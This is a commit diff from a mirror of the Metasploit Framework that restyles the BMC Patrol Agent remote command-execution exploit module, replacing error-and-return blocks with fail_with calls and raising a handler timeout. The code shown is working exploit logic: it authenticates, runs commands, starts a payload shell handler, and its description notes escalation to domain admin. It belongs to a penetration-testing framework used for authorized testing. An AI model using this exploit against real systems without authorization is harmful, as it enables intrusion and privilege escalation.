infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Style police :P

master
rwincey 2019-02-13 00:35:54 -05:00
parent b55fdc7323
commit e716c24f2d
1 changed files with 25 additions and 47 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

72
modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb
View File

@ -144,7 +144,8 @@ class MetasploitModule < Msf::Exploit::Remote
of the provided user is correct. This also means if the software is running on a of the provided user is correct. This also means if the software is running on a
domain controller, it can be used to escalate from a normal domain user to domain domain controller, it can be used to escalate from a normal domain user to domain
admin as SYSTEM on a DC is DA. **WARNING** The windows version of this exploit uses admin as SYSTEM on a DC is DA. **WARNING** The windows version of this exploit uses
powershell to execute the payload. powershell to execute the payload. The powershell version tends to timeout on
the first run so it may take multiple tries.
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => 'Author' =>
@ -189,6 +190,7 @@ class MetasploitModule < Msf::Exploit::Remote
def cleanup def cleanup
disconnect disconnect
print_status("Disconnected from BMC Patrol Agent.")
@inflater.close @inflater.close
@deflater.close @deflater.close
super super
@ -196,10 +198,7 @@ class MetasploitModule < Msf::Exploit::Remote
def get_target_os( srv_info_msg ) def get_target_os( srv_info_msg )
lines = srv_info_msg.split("\n") lines = srv_info_msg.split("\n")
if lines[0] != "MS" and lines[1] != "{" and lines[-1] != "}" fail_with(Failure::UnexpectedReply, "Invalid server info msg.") if lines[0] != "MS" and lines[1] != "{" and lines[-1] != "}"
print_error("Invalid server info msg.")
return
end
os = $nil os = $nil
ver = $nil ver = $nil
@ -213,23 +212,20 @@ class MetasploitModule < Msf::Exploit::Remote
end end
end end
end end
return [os,ver] [os,ver]
end end
def get_cmd_output( cmd_output_msg ) def get_cmd_output( cmd_output_msg )
lines = cmd_output_msg.split("\n") lines = cmd_output_msg.split("\n")
if lines[0] != "PEM_MSG" and lines[1] != "{" and lines[-1] != "}" fail_with(Failure::UnexpectedReply, "Invalid command output msg.") if lines[0] != "PEM_MSG" and lines[1] != "{" and lines[-1] != "}"
print_error("Invalid command output msg.")
return
end
#Parse out command results #Parse out command results
idx_start = cmd_output_msg.index("Result\x00") idx_start = cmd_output_msg.index("Result\x00")
idx_end = cmd_output_msg.index("RemPsl_user") idx_end = cmd_output_msg.index("RemPsl_user")
output = cmd_output_msg[idx_start+7..idx_end-1] output = cmd_output_msg[idx_start+7..idx_end-1]
return output output
end end
def exploit def exploit
@ -243,13 +239,14 @@ class MetasploitModule < Msf::Exploit::Remote
#Configure the payload handler #Configure the payload handler
payload_instance.exploit_config = { payload_instance.exploit_config = {
'active_timeout' => 180 'active_timeout' => 300
} }
# Set up the payload handlers #Setup the payload handler
payload_instance.setup_handler payload_instance.setup_handler
# Start the payload handler #Start the payload handler
payload_instance.start_handler payload_instance.start_handler
end end
#Initialize zlib objects #Initialize zlib objects
@ -263,45 +260,29 @@ class MetasploitModule < Msf::Exploit::Remote
#Create session msg #Create session msg
create_session create_session
ret_data = receive_msg ret_data = receive_msg
if ret_data == $nil fail_with(Failure::UnexpectedReply, "Failed to receive session confirmation. Aborting.") if ret_data == $nil
print_error("Failed to receive session confirmation. Aborting.")
return
end
ret_len = ret_data.length
#Authenticate #Authenticate
authenticate_user(datastore['USER'], datastore['PASSWORD']) authenticate_user(datastore['USER'], datastore['PASSWORD'])
#receive the authentication response #receive the authentication response
ret_data = receive_msg() ret_data = receive_msg
if ret_data == $nil fail_with(Failure::UnexpectedReply, "Failed to receive authentication response. Aborting.") if ret_data == $nil
print_error("Failed to receive authentication response. Aborting.")
return
end
ret_msg = process_response( ret_data ) ret_msg = process_response(ret_data)
if ret_msg =~ /logged in/ if ret_msg =~ /logged in/
print_status("Successfully authenticated user.") print_status("Successfully authenticated user.")
else else
print_error("Login failed. Aborting.") fail_with(Failure::UnexpectedReply, "Login failed. Aborting.")
return
end end
#receive the server info #receive the server info
ret_data = receive_msg() ret_data = receive_msg
if ret_data == $nil fail_with(Failure::UnexpectedReply, "Failed to receive server info msg. Aborting.") if ret_data == $nil
print_error("Failed to receive server info msg. Aborting.") srv_info = process_response(ret_data)
return
end
srv_info = process_response( ret_data )
#Get the target's OS from their info msg #Get the target's OS from their info msg
target_os = get_target_os(srv_info) target_os = get_target_os(srv_info)
if target_os == $nil
print_error("Invalid server info msg. Aborting.")
return
end
# When using auto targeting, MSF selects the Windows meterpreter as the default payload. # When using auto targeting, MSF selects the Windows meterpreter as the default payload.
# Fail if this is the case and ask the user to select an appropriate payload. # Fail if this is the case and ask the user to select an appropriate payload.
@ -324,19 +305,17 @@ class MetasploitModule < Msf::Exploit::Remote
run_cmd(command) run_cmd(command)
#receive command confirmation #receive command confirmation
ret_data = receive_msg() ret_data = receive_msg
if ret_data != $nil if ret_data != $nil
process_response( ret_data ) process_response(ret_data)
end end
#receive command output #receive command output
ret_data = receive_msg() ret_data = receive_msg
if ret_data != $nil and datastore['CMD'] != $nil if ret_data != $nil and datastore['CMD'] != $nil
cmd_result_data = process_response( ret_data ) cmd_result_data = process_response( ret_data )
cmd_result = get_cmd_output(cmd_result_data) cmd_result = get_cmd_output(cmd_result_data)
if cmd_result != $nil print_status( "Output:\n#{cmd_result}" )
print_status( "Output:\n#{cmd_result}" )
end
end end
#Handle the shell #Handle the shell
@ -344,7 +323,7 @@ class MetasploitModule < Msf::Exploit::Remote
end end
def receive_msg() def receive_msg
header = sock.get_once(6) header = sock.get_once(6)
if header == $nil if header == $nil
@ -367,7 +346,6 @@ class MetasploitModule < Msf::Exploit::Remote
def send_msg(type, compression, data) def send_msg(type, compression, data)
ret_len = 0
data_len = data.length data_len = data.length
buf = [data_len].pack('N') buf = [data_len].pack('N')
@ -1078,7 +1056,7 @@ class MetasploitModule < Msf::Exploit::Remote
def des_string_to_key( key_buf_str ) def des_string_to_key( key_buf_str )
init_des() init_des
temp_key1 = Array.new(8,0) temp_key1 = Array.new(8,0)
temp_key2 = Array.new(8,0) temp_key2 = Array.new(8,0)